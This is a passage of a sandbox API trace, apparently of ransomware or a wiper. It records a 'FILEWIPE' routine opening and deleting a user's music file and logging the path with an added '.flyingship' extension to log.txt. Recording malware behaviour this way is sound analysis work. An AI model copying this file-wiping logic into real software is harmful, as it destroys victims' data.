lpsz="FILEWIPE") returned 0x8 [0186.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0186.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.947] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.947] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0x90af58 [0186.947] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.948] CharLowerBuffW (in: lpsz="byte[14632]", cchLength=0xb | out: lpsz="byte[14632]") returned 0xb [0186.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.948] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.948] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.948] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0186.948] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0186.948] FreeLibrary (hLibModule=0x75c90000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.949] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.949] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.950] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0186.950] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\kdbywx3dopbmqwfnv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0186.951] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.951] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.951] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0186.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.952] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.952] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.952] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.952] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.952] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.975] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0186.975] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.975] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.975] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.975] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFilePart=0x0) returned 0x5e [0186.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x14acf4c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0x90af58 [0186.976] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\kdbywx3dopbmqwfnv.m4a")) returned 1 [0186.977] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x14acf4c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0 [0186.977] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.977] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.978] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.978] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0186.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.980] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.980] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.980] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0186.980] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.980] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0186.981] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x263e, lpOverlapped=0x0) returned 1 [0186.981] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0186.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x263e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0186.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\n", cchWideChar=108, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 108 [0186.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0186.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\n", cchWideChar=108, lpMultiByteStr=0x906f38, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 108 [0186.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0186.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0186.982] WriteFile (in: hFile=0x120, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6b, lpOverlapped=0x0) returned 1 [0186.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0186.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.982] CloseHandle (hObject=0x120) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900098 | out: hHeap=0x8a0000) returned 1 [0186.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: 